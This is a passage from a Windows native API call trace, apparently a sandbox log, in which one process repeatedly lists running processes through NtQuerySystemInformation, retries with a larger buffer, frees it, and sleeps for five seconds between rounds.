Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.534] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0158.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0158.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0158.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0158.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0158.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0158.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0159.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0159.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.878] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0159.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0159.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0159.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0159.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0159.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0159.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0159.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0159.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0159.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0160.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0160.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0160.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0160.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0160.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0160.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) 